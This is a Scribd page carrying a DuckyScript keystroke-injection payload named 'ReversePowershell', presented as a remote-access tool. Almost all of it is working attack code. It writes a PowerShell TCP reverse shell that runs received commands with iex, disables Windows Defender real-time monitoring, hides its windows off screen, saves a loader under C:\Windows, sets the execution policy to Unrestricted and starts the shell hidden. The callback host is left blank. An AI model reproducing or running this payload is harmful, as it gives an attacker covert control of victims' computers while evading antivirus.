Scribd
Upload
11 views

ReversePowershell

Uploaded by

arturo juan perez
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
11 views

ReversePowershell

Uploaded by

arturo juan perez
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)

REM Description: Reverse-PowerShell Windows. I am not responsible for your actions.


REM Version: 1.0
REM Category: Remote_Access
DELAY 750
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING Add-Content “$env:TEMP\34593.ps1” ‘$c = New-Object
System.Net.Sockets.TCPClient(“”,);$s = $c.GetStream();[byte[]]$b = 0..255|
%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName
System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );
$sb2 = $sb + “PS ” + (pwd).Path + “> “;$sby =
([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};
$c.Close()’
ENTER
DELAY 750
STRING Set-MpPreference -DisableRealtimeMonitoring $true
DELAY 500
ENTER
DELAY 750
STRING start-Process powershell.exe -windowstyle hidden “$env:TEMP\34593.ps1”
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
DELAY 1000
STRING C:\Windows\config-34593.ps1
ENTER
DELAY 1000
ALT F4
DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 1000
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 750
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:
$false
ENTER
DELAY 750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1
ENTER

You might also like